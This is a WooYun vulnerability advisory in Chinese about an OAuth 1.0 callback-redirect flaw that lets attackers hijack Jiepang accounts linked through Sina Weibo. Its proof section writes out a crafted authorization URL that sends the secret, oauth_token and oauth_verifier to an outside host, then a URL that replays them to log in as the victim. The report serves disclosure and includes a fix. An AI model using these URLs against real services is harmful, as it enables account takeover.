漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02010
漏洞标题:街旁网第三方登录劫持漏洞
相关厂商:街旁网
漏洞作者: rayh4c
提交时间:2011-04-29 16:55
修复时间:2011-05-04 18:00
公开时间:2011-05-04 18:00
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-04-29: 细节已通知厂商并且等待厂商处理中
2011-05-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
街旁网使用了新浪微博的Oauth授权作为自己的第三方账户登录接口,由于Oauth1.0协议存在安全漏洞,导致通过新浪微博登录街旁网的账户能被任意劫持控制。
详细说明:
Oauth1.0协议存在安全漏洞,oauth_callback参数能重定向到任意网站,通过该漏洞黑客可以构造恶意的授权URL,从而获取用户关键的secret,oauth_token,oauth_verifier关键参数。
街旁使用的新浪微博的Oauth授权方式的登录接口存在此类型的漏洞,黑客可以任意劫持控制以此方式登录的街旁账户。
漏洞证明:
1.准备一个已授权街旁登录的新浪微博账户。
2.登录新浪微博后,受害者访问了恶意的授权URL,如重定向到163.com
http://api.t.sina.com.cn/oauth/authorize?oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_callback=http%3A%2F%2F163.com%2Fsignup%2Fsina%3Fsecret=4296ae3151651e83b2117b09f798ae98&display=page
3.返回的第三方验证URL重定向到163.com
http://www.163.com/?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
4.那么163服务器将可以盗取secret,oauth_token,oauth_verifier关键参数,通过街旁的登录接口登录受害者的账户。
http://jiepang.com/signup/sina?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
整个过程只需要受害者在新浪微博上点击一个恶意的授权URL即可。
修复方案:
建议和新浪相关方协商
1.将街旁的授权接口的oauth_callback参数限定为街旁固定的安全的URL。
2.控制oauth授权的时效性,不使用永久授权方式。
版权声明:转载请注明来源 rayh4c@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-05-04 18:00
厂商回复:
漏洞Rank:10 (WooYun评价)
最新状态:
暂无